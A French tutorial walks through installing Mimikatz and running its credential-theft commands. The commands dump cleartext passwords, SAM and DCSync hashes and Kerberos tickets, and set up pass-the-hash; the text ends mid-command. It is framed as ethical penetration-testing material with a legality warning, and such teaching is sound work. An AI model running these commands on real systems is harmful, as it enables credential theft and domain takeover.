Mimikatz est un puissant outil de post-exploitation conçu pour extraire de la mémoire des mots de passe en clair, des hachages, des codes PIN et des tickets Kerberos. Il est largement utilisé par les testeurs d’intrusion et les professionnels de la sécurité pour évaluer les vulnérabilités des systèmes. Ce guide fournit une approche pas à pas de l’installation et de l’utilisation de Mimikatz pour les tests de sécurité éthiques.
Avertissement : L’utilisation non autorisée de Mimikatz est illégale. Assurez-vous d’avoir l’autorisation avant de l’utiliser dans n’importe quel environnement.
Avant d’installer Mimikatz, assurez-vous que vous disposez des éléments suivants :
Mimikatz est un outil open-source disponible sur GitHub. Pour le télécharger :
Vous pouvez également cloner le dépôt à l’aide de Git :
git clone https://github.com/gentilkiwi/mimikatz.git
Étant donné que Mimikatz nécessite des privilèges administratifs, suivez les étapes suivantes pour l’exécuter :
cd path\to\mimikatz\x64
mimikatz.exe
mimikatz #.
Avant d’extraire les informations d’identification, vérifiez que vous disposez des privilèges suffisants :
privilege::debug
En cas de succès, vous devriez voir : Privilège '20' OK
Pour extraire les mots de passe en clair de la mémoire, utilisez :
sekurlsa::logonpasswords
Cela affichera le nom d’utilisateur, le domaine et les mots de passe en clair s’ils sont disponibles.
Les hachages NTLM peuvent être utilisés pour des attaques de type “pass-the-hash”. Pour les extraire, exécutez
lsadump::sam
Ou, pour les systèmes distants :
lsadump::dcsync /domain:targetdomain.com /user:Administrator
Pour extraire les tickets Kerberos du système :
sekurlsa::tickets /export
Cela permet d’exporter des fichiers .kirbi
, qui peuvent être utilisés dans des attaques de type “pass-the-ticket”.
Pour s’authentifier avec un hachage NTLM au lieu d’un mot de passe :
sekurlsa::pth /utilisateur:Administrateur /domaine:exemple.com /ntlm: